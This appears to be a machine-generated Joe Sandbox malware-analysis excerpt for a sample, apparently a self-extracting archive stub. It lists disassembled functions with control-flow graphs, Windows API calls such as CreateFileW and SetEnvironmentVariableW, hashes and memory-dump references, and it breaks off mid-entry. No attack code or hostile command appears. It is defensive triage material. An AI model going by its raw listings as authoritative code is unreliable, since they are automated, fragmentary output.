                                                                                              • Opcode ID: 9c20779fc36d8d7a77c624a7ee7b0520d5e3ec44038f915f2aa3d4f16842a100
                                                                                              • Instruction ID: b00d14d6fb279483d06b0580bbc7f0ff5c27c7e56531c3fa777c35ea66dc43e6
                                                                                              • Opcode Fuzzy Hash: 9c20779fc36d8d7a77c624a7ee7b0520d5e3ec44038f915f2aa3d4f16842a100
                                                                                              • Instruction Fuzzy Hash: EAB1BD71A00248DECF25EF74D9857EE77B5EF84B04F28A11AE84CB7254DB70AE458B50
                                                                                              Function 00E82813 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 297COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1052 e82813-e82845 call e67673 1055 e8284a-e82850 1052->1055 1056 e82847 1052->1056 1057 e82abd 1055->1057 1058 e82856-e8285b 1055->1058 1056->1055 1061 e82abf-e82ac3 1057->1061 1059 e8285d 1058->1059 1060 e82860-e8286e 1058->1060 1059->1060 1062 e82870-e8287c 1060->1062 1063 e82896 1060->1063 1064 e82ace-e82ad2 1061->1064 1065 e82ac5-e82ac8 1061->1065 1062->1063 1069 e8287e 1062->1069 1070 e82899-e8289c 1063->1070 1067 e82af7 1064->1067 1068 e82ad4-e82ad7 1064->1068 1066 e82aca-e82acc 1065->1066 1065->1067 1071 e82ada-e82af2 call e67673 call e838a0 1066->1071 1079 e834ad-e834ed call e658cb 1067->1079 1068->1067 1072 e82ad9 1068->1072 1073 e82884-e82888 1069->1073 1074 e828a2-e828a7 1070->1074 1075 e82ab7 1070->1075 1071->1067 1072->1071 1080 e8288e-e82894 1073->1080 1081 e829f0-e829f2 1073->1081 1076 e828a9 1074->1076 1077 e828ac-e828d7 call e8acee call e61afc 1074->1077 1075->1057 1076->1077 1077->1079 1092 e828dd-e828e1 1077->1092 1100 e834f7-e83500 1079->1100 1101 e834f2 call e857d8 1079->1101 1080->1063 1080->1073 1081->1063 1084 e829f8-e829fc 1081->1084 1084->1070 1094 e828e3 1092->1094 1095 e828e5-e828ec 1092->1095 1094->1095 1096 e828ee 1095->1096 1097 e828f1-e8292f call e6120c call e7645a 1095->1097 1096->1097 1109 e82935-e82937 1097->1109 1103 e83502 1100->1103 1104 e83504-e83514 call e70d1d 1100->1104 1101->1100 1103->1104 1112 e8356a-e8356f call e85787 1104->1112 1113 e83516-e8351c 1104->1113 1110 e8293d-e8299f call e614a7 call e6adaa call e61a66 call e614a7 call e6adaa call e61a66 1109->1110 1111 e82a01-e82a07 1109->1111 1159 e829a1-e829a3 1110->1159 1160 e829a4-e829d2 call e614a7 call e6adaa call e61a66 1110->1160 1118 e82a09-e82a24 1111->1118 1119 e82a4e-e82a68 1111->1119 1115 e8351e 1113->1115 1116 e83520-e83526 1113->1116 1115->1116 1121 e83528-e83531 call e713da 1116->1121 1122 e83533-e83565 call e69733 call e61150 call e625a4 call e61a66 * 2 1116->1122 1126 e82a45-e82a4d call e85726 1118->1126 1127 e82a26-e82a3f call e619a9 1118->1127 1124 e82a6a-e82a85 1119->1124 1125 e82aaf-e82ab5 1119->1125 1121->1112 1121->1122 1122->1112 1131 e82aa6-e82aae call e85726 1124->1131 1132 e82a87-e82aa0 call e619a9 1124->1132 1125->1061 1126->1119 1127->1126 1131->1125 1132->1131 1159->1160 1167 e829d4-e829d6 1160->1167 1168 e829d7-e829eb call e7645a 1160->1168 1167->1168 1168->1109
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: HIDE$MAX$MIN
                                                                                              • API String ID: 176396367-2426493550
                                                                                              • Opcode ID: 766fc3d9172fa8bc9235840a4f4dffa9802c3eef007990abbd66f40275269a80
                                                                                              • Instruction ID: 3d716e7d65d7cb30aaf35f1d07e5cd33fbffb64fef459b79e845af4688e4d989
                                                                                              • Opcode Fuzzy Hash: 766fc3d9172fa8bc9235840a4f4dffa9802c3eef007990abbd66f40275269a80
                                                                                              • Instruction Fuzzy Hash: FBB1AE72C00258DACF25EFA4CC85ADDB7B8BF49314F14169EE50DB7281DB709A85CBA1
                                                                                              Function 00E79556 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 258COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1171 e79556-e79572 call e7a570 1174 e795e4-e795f1 1171->1174 1175 e79574-e79577 1171->1175 1176 e795f4-e795f6 1175->1176 1177 e79579-e79593 1175->1177 1176->1174 1180 e795f8-e7960a call e7906e 1176->1180 1178 e79595-e79597 1177->1178 1179 e7959b-e7959d 1177->1179 1178->1179 1182 e7959f-e795ac call e8d08c 1179->1182 1183 e7960c-e7961a call e7906e 1179->1183 1187 e7961e-e79637 call e8734a 1180->1187 1191 e795ae-e795b9 1182->1191 1192 e795bd-e795e2 call e871f0 1182->1192 1183->1187 1198 e79639-e7963e 1187->1198 1199 e79648-e7964d 1187->1199 1191->1183 1194 e795bb 1191->1194 1192->1174 1192->1175 1194->1182 1200 e79644-e79646 1198->1200 1201 e79640-e79642 1198->1201 1202 e7964f 1199->1202 1203 e7965d-e7965f 1199->1203 1206 e79671-e7967e 1200->1206 1201->1199 1201->1200 1207 e79655-e79657 1202->1207 1208 e79773-e79781 call e7906e 1202->1208 1204 e79665-e7966b 1203->1204 1205 e7975f-e79771 call e7906e 1203->1205 1204->1205 1204->1206 1216 e79785-e79786 call e8734a 1205->1216 1210 e79685-e79690 1206->1210 1211 e79680-e79683 1206->1211 1207->1203 1207->1208 1208->1216 1214 e79696-e7969c 1210->1214 1211->1210 1211->1214 1217 e79755-e7975c 1214->1217 1218 e796a2 1214->1218 1222 e7978b-e79799 call e7906e 1216->1222 1220 e796a4-e796aa 1218->1220 1221 e796b0-e796b2 1218->1221 1220->1217 1220->1221 1223 e796b4-e796b7 1221->1223 1224 e796dc-e796eb call e8d087 1221->1224 1233 e7979d-e797b7 call e8734a call e857a5 1222->1233 1223->1222 1226 e796bd-e796c4 1223->1226 1231 e796f2-e796f3 call e8d08c 1224->1231 1232 e796ed-e796f0 1224->1232 1226->1224 1229 e796c6-e796c8 1226->1229 1229->1224 1234 e796ca 1229->1234 1242 e796f8-e796fd 1231->1242 1235 e796ff-e79701 1232->1235 1257 e797d2-e797d5 1233->1257 1258 e797b9-e797bf call e85ddf 1233->1258 1234->1222 1237 e796d0-e796d6 1234->1237 1239 e79703-e79709 1235->1239 1240 e79721 1235->1240 1237->1222 1237->1224 1243 e7971f 1239->1243 1244 e7970b-e7971d call e7906e 1239->1244 1245 e79723 1240->1245 1246 e79739 1240->1246 1242->1235 1248 e79740-e79747 1242->1248 1243->1240 1244->1233 1250 e79725-e7972b 1245->1250 1251 e7972d-e79734 call e79556 1245->1251 1246->1248 1248->1217 1253 e79749-e7974f 1248->1253 1250->1246 1250->1251 1251->1246 1253->1217 1259 e79896-e7989b call e85773 1257->1259 1260 e797db-e79810 call e85ddf 1257->1260 1262 e797c4-e797cf call e871f0 1258->1262 1269 e79812-e79828 call e85b4b 1260->1269 1270 e7982d-e79848 call e871f0 1260->1270 1262->1257 1269->1270 1270->1259 1274 e7984a-e7984c 1270->1274 1275 e7984f-e7985b 1274->1275 1276 e7985d-e7986c call e8d08c 1275->1276 1277 e79889-e79894 1275->1277 1279 e79871-e7987a 1276->1279 1277->1259 1277->1275 1280 e79886 1279->1280 1281 e7987c-e79881 call e69384 1279->1281 1280->1277 1281->1280
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Lc$Lc$Lc$Lc
                                                                                              • API String ID: 431132790-651681125
                                                                                              • Opcode ID: 2997a24532bfa4431a6c553f5d9cf17e0bdb2c3f3e70478dd70717d1443c92b5
                                                                                              • Instruction ID: 18bc5809c97d1a4fadaccd1b87b59ff276091d9a16a2db09aada071105a00586
                                                                                              • Opcode Fuzzy Hash: 2997a24532bfa4431a6c553f5d9cf17e0bdb2c3f3e70478dd70717d1443c92b5
                                                                                              • Instruction Fuzzy Hash: D98157719043148FDB28EF64C889B6EB7E5FF81314F14A92EE45DB7183EBB099448792
                                                                                              Function 00E83EFC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1283 e83efc-e83f11 call e857d8 1286 e83f13 1283->1286 1287 e83f15-e83f45 SetEnvironmentVariableW call e76366 1283->1287 1286->1287 1289 e83f4a-e83f4c 1287->1289 1290 e83f8c-e83f92 1289->1290 1291 e83f4e 1289->1291 1293 e83f94-e83fa9 1290->1293 1294 e83fc7-e83fcc call e85787 1290->1294 1292 e83f51-e83f57 1291->1292 1295 e83f59 1292->1295 1296 e83f5b-e83f67 call e76624 1292->1296 1298 e83fab-e83fbb call e619a9 1293->1298 1299 e83fbe-e83fc6 call e85726 1293->1299 1295->1296 1307 e83f69-e83f70 1296->1307 1308 e83f72-e83f76 1296->1308 1298->1299 1299->1294 1307->1292 1309 e83f78 1308->1309 1310 e83f7a-e83f86 SetEnvironmentVariableW 1308->1310 1309->1310 1310->1290
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E83F03
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 00E83F1B
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00E83F86
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable$H_prolog3_
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 3605364767-3493335439
                                                                                              • Opcode ID: fcd6ed44cfb69a1d07ca966394a5a14a9a8e57c1117b29df93efb3dd320f3b57
                                                                                              • Instruction ID: a206bc3d351ea017fb5840e043daddfc2d8394f9a43124910992d1982d16ab09
                                                                                              • Opcode Fuzzy Hash: fcd6ed44cfb69a1d07ca966394a5a14a9a8e57c1117b29df93efb3dd320f3b57
                                                                                              • Instruction Fuzzy Hash: 5D212470E012089FCF14EFA8E9859EDB7F9FB48700B50641AF549B7240CB31AA48CBA4
                                                                                              Function 00E6E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1311 e6e180-e6e1c9 1312 e6e1d4 1311->1312 1313 e6e1cb-e6e1ce 1311->1313 1315 e6e1d6-e6e1e6 1312->1315 1313->1312 1314 e6e1d0-e6e1d2 1313->1314 1314->1315 1316 e6e1ee-e6e1f8 1315->1316 1317 e6e1e8 1315->1317 1318 e6e1fd-e6e22a 1316->1318 1319 e6e1fa 1316->1319 1317->1316 1320 e6e232-e6e238 1318->1320 1321 e6e22c 1318->1321 1319->1318 1322 e6e23c-e6e254 CreateFileW 1320->1322 1323 e6e23a 1320->1323 1321->1320 1324 e6e316 1322->1324 1325 e6e25a-e6e28a GetLastError call e7169a 1322->1325 1323->1322 1327 e6e319-e6e31c 1324->1327 1333 e6e2be 1325->1333 1334 e6e28c-e6e293 1325->1334 1329 e6e31e-e6e321 1327->1329 1330 e6e32a-e6e32e 1327->1330 1329->1330 1335 e6e323 1329->1335 1331 e6e330-e6e333 1330->1331 1332 e6e34f-e6e360 1330->1332 1331->1332 1336 e6e335-e6e34c SetFileTime 1331->1336 1338 e6e374-e6e39a call e61a66 call e85734 1332->1338 1339 e6e362-e6e370 call e625c3 1332->1339 1337 e6e2c1-e6e2cb 1333->1337 1340 e6e295 1334->1340 1341 e6e298-e6e2b8 CreateFileW GetLastError 1334->1341 1335->1330 1336->1332 1343 e6e300-e6e314 1337->1343 1344 e6e2cd-e6e2e2 1337->1344 1339->1338 1340->1341 1341->1333 1342 e6e2ba-e6e2bc 1341->1342 1342->1337 1343->1327 1347 e6e2f7-e6e2ff call e85726 1344->1347 1348 e6e2e4-e6e2f4 call e619a9 1344->1348 1347->1343 1348->1347
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,522FB702,?,?,00000000,?,?,00000000,00E99E6B,000000FF), ref: 00E6E248
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00E6E25A
                                                                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00E99E6B,000000FF,?,00000011), ref: 00E6E2A6
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00E6E2AF
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00E99E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00E6E346
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 7fa82eb677e5c31eee28d33f3b8fc2268684caf1b572e14d9ce0bec0f3f24d60
                                                                                              • Instruction ID: 83d9b0611eb4e9ac7e9ecc77f73a102437d1c1890a1870bc905f0c6bb07d2920
                                                                                              • Opcode Fuzzy Hash: 7fa82eb677e5c31eee28d33f3b8fc2268684caf1b572e14d9ce0bec0f3f24d60
                                                                                              • Instruction Fuzzy Hash: DF61BB74840249DFDB24CFA4E885BEE7BE5FB08358F20162AF819A73D0D774A944CB94
                                                                                              Function 00E774EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1357 e774ec-e77536 call e777cf ReleaseSemaphore 1360 e77556-e7758a DeleteCriticalSection CloseHandle * 2 1357->1360 1361 e77538 1357->1361 1362 e7753b-e77554 call e775ed CloseHandle 1361->1362 1362->1360
                                                                                              APIs
                                                                                                • Part of subcall function 00E777CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00E673B8), ref: 00E777E1
                                                                                                • Part of subcall function 00E777CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00E673B8), ref: 00E777F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,522FB702,?,?,00000001,00000000,00E9A603,000000FF,?,00E790B9,?,?,00E65630,?), ref: 00E7752A
                                                                                              • CloseHandle.KERNELBASE(?,?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?), ref: 00E77544
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E7755D
                                                                                              • CloseHandle.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E77569
                                                                                              • CloseHandle.KERNEL32(?,?,00E790B9,?,?,00E65630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00E77575
                                                                                                • Part of subcall function 00E775ED: WaitForSingleObject.KERNEL32(?,000000FF,00E7770A,?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775F3
                                                                                                • Part of subcall function 00E775ED: GetLastError.KERNEL32(?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: c494b299c9a2f1af577c0a86bd0e44ad821440032da89a35678a3da3395ff641
                                                                                              • Instruction ID: 333b0317276e1a8597f28d57f4f3bb4afcb5441360c3009551d064718f26f32c
                                                                                              • Opcode Fuzzy Hash: c494b299c9a2f1af577c0a86bd0e44ad821440032da89a35678a3da3395ff641
                                                                                              • Instruction Fuzzy Hash: 85116D72504704EFC722AF65DC84BC6FBA9FB08750F50492BF16AA21A0CB71A9458B60
                                                                                              Function 00E80678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1365 e80678-e80691 PeekMessageW 1366 e806cc-e806ce 1365->1366 1367 e80693-e806a7 GetMessageW 1365->1367 1368 e806b8-e806c6 TranslateMessage DispatchMessageW 1367->1368 1369 e806a9-e806b6 IsDialogMessageW 1367->1369 1368->1366 1369->1366 1369->1368
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
                                                                                              • IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
                                                                                              • TranslateMessage.USER32(?), ref: 00E806BC
                                                                                              • DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: 0d60d6910af8c3c21adf13c2c30941b996f883c5316511ea33cbb83f6fceb8b7
                                                                                              • Instruction ID: a663d0441deddf276b1f65e09303dbce9f51277001f66d38600fdd1ee486f7cb
                                                                                              • Opcode Fuzzy Hash: 0d60d6910af8c3c21adf13c2c30941b996f883c5316511ea33cbb83f6fceb8b7
                                                                                              • Instruction Fuzzy Hash: 1CF0BDB1D0621AAF8B60BBE2EC4CEDB7FACEF852957004516B54AF2450E624D509CBB0
                                                                                              Function 00E7F2CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1370 e7f2ce-e7f2f7 GetClassNameW 1371 e7f31f-e7f321 1370->1371 1372 e7f2f9-e7f30e call e78da4 1370->1372 1374 e7f323-e7f326 SHAutoComplete 1371->1374 1375 e7f32c-e7f338 call e85734 1371->1375 1378 e7f310-e7f31c FindWindowExW 1372->1378 1379 e7f31e 1372->1379 1374->1375 1378->1379 1379->1371
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00E7F2EF
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E7F326
                                                                                                • Part of subcall function 00E78DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00E70E3F,?,?,?,00000046,00E71ECE,00000046,?,exe,00000046), ref: 00E78DBA
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E7F316
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: a5a39aea930fa664962ffe97623f06b813702297bf3d49445b9b12520d58b940
                                                                                              • Instruction ID: 8d143ff8388895b76d81069229adc07d9988f8822c51dc29a26dd6318c6dea58
                                                                                              • Opcode Fuzzy Hash: a5a39aea930fa664962ffe97623f06b813702297bf3d49445b9b12520d58b940
                                                                                              • Instruction Fuzzy Hash: 80F0C831605618BFDB20AB259D09FDF77AC9F85B00F005166FA44FB1D1DAB0AD09C6A5
                                                                                              Function 00E7F4D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00E76C5E: __EH_prolog3_GS.LIBCMT ref: 00E76C65
                                                                                                • Part of subcall function 00E76C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E76C9A
                                                                                              • OleInitialize.OLE32(00000000), ref: 00E7F4ED
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E7F524
                                                                                              • SHGetMalloc.SHELL32(00EB532C), ref: 00E7F52E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                                                                              • String ID: riched20.dll
                                                                                              • API String ID: 2446841611-3360196438
                                                                                              • Opcode ID: a786901676f8cf631064da31584211c39ac0b1731aa18efe467486f66d8ab001
                                                                                              • Instruction ID: 097b5516cc4c468791d6069780d264188378055cc5bd3ccb1cdd1d3ca113cf2d
                                                                                              • Opcode Fuzzy Hash: a786901676f8cf631064da31584211c39ac0b1731aa18efe467486f66d8ab001
                                                                                              • Instruction Fuzzy Hash: 6EF049B1C04209AFCB10AF9ACC499EFFBFCEF84304F10415AE445B2250DBB856098BA0
                                                                                              Function 00E6E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1385 e6e948-e6e961 call e857d8 1388 e6e963-e6e965 1385->1388 1389 e6e96a-e6e974 1385->1389 1390 e6eaa6-e6eaab call e85787 1388->1390 1391 e6e976-e6e983 GetStdHandle 1389->1391 1392 e6e988 1389->1392 1393 e6ea6f-e6ea72 1391->1393 1394 e6e98b-e6e998 1392->1394 1393->1394 1396 e6e9df-e6e9f4 WriteFile 1394->1396 1397 e6e99a-e6e99e 1394->1397 1399 e6e9f7-e6e9f9 1396->1399 1400 e6e9a0-e6e9ab 1397->1400 1401 e6e9ff-e6ea03 1397->1401 1399->1401 1402 e6ea9f-e6eaa2 1399->1402 1404 e6e9af-e6e9ce WriteFile 1400->1404 1405 e6e9ad 1400->1405 1401->1402 1403 e6ea09-e6ea0d 1401->1403 1402->1390 1403->1402 1406 e6ea13-e6ea25 call e69230 1403->1406 1404->1399 1407 e6e9d0-e6e9db 1404->1407 1405->1404 1411 e6ea77-e6ea9a call e614a7 call e69653 call e61a66 1406->1411 1412 e6ea27-e6ea30 1406->1412 1407->1400 1409 e6e9dd 1407->1409 1409->1399 1411->1402 1412->1394 1414 e6ea36-e6ea3a 1412->1414 1414->1394 1416 e6ea40-e6ea6c 1414->1416 1416->1393
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6E94F
                                                                                              • GetStdHandle.KERNEL32(000000F5,0000002C,00E72D28,?,?,?,?,00000000,00E7ABB6,?,?,?,?,?,00E7A80E,?), ref: 00E6E978
                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E6E9BE
                                                                                              Memory Dump Source
